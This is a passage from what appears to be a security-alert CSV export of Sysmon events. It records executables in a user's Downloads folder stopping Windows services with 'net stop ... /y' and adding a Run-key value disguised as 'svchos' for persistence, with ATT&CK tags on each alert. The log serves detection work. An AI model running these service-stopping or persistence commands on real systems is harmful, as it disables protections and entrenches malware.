/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:24.055193400Z"",""eventRecordID"":""1100"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:24.042\r\nProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400}\r\nProcessId: 86532\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:24.042"",""processGuid"":""{df9fc3d3-d198-5ec7-0000-001007f72400}"",""processId"":""86532"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:38:32.129",9,"Windows Application error event","""Faulting application name: taskhostw.exe, version: 10.0.18362.387, time stamp: 0x5fefc7f9 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xd6c +Faulting application start time: 0x01d6303b4db78973 +Faulting application path: 
C:\Windows\system32\taskhostw.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4498a57d-5e80-4b6b-89ed-aa13bfe0863c +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:38:31.766",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:23.209 +ProcessGuid: {df9fc3d3-d197-5ec7-0000-001040e52400} +ProcessId: 85008 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:23.216784400Z"",""eventRecordID"":""1099"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:23.209\r\nProcessGuid: 
{df9fc3d3-d197-5ec7-0000-001040e52400}\r\nProcessId: 85008\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:23.209"",""processGuid"":""{df9fc3d3-d197-5ec7-0000-001040e52400}"",""processId"":""85008"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:38:25.881",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:17.278 +ProcessGuid: {df9fc3d3-d191-5ec7-0000-001024f02300} +ProcessId: 72068 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300} +ParentProcessId: 70160 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:17.295002800Z"",""eventRecordID"":""1096"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:17.278\r\nProcessGuid: {df9fc3d3-d191-5ec7-0000-001024f02300}\r\nProcessId: 72068\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300}\r\nParentProcessId: 70160\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:17.278"",""processGuid"":""{df9fc3d3-d191-5ec7-0000-001024f02300}"",""processId"":""72068"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d190-5ec7-0000-001004d72300}"",""parentProcessId"":""70160"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:38:25.517",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:17.019 +ProcessGuid: {df9fc3d3-d191-5ec7-0000-0010c8df2300} +ProcessId: 70884 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300} +ParentProcessId: 68684 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:17.024798500Z"",""eventRecordID"":""1095"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:17.019\r\nProcessGuid: {df9fc3d3-d191-5ec7-0000-0010c8df2300}\r\nProcessId: 70884\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300}\r\nParentProcessId: 68684\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:17.019"",""processGuid"":""{df9fc3d3-d191-5ec7-0000-0010c8df2300}"",""processId"":""70884"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d190-5ec7-0000-00109cc32300}"",""parentProcessId"":""68684"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:38:25.414",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:16.888 +ProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300} +ProcessId: 70160 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:16.923482900Z"",""eventRecordID"":""1094"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:16.888\r\nProcessGuid: {df9fc3d3-d190-5ec7-0000-001004d72300}\r\nProcessId: 70160\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:16.888"",""processGuid"":""{df9fc3d3-d190-5ec7-0000-001004d72300}"",""processId"":""70160"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:25.368",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:16.457 +ProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300} +ProcessId: 68684 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:16.480866900Z"",""eventRecordID"":""1093"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:16.457\r\nProcessGuid: {df9fc3d3-d190-5ec7-0000-00109cc32300}\r\nProcessId: 68684\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:16.457"",""processGuid"":""{df9fc3d3-d190-5ec7-0000-00109cc32300}"",""processId"":""68684"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:22.142",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 23, 2020 @ 12:38:14.357",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:20:06.156 +ProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100} +ProcessId: 42832 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John 
Williams\Downloads\sQCMgCG.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:06.176674400Z"",""eventRecordID"":""1088"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:20:06.156\r\nProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100}\r\nProcessId: 42832\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:20:06.156"",""processGuid"":""{df9fc3d3-d186-5ec7-0000-00107e962100}"",""processId"":""42832"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe""}}}" +"May 23, 2020 @ 12:38:14.244",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:06.011 +ProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100} +ProcessId: 42832 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d 
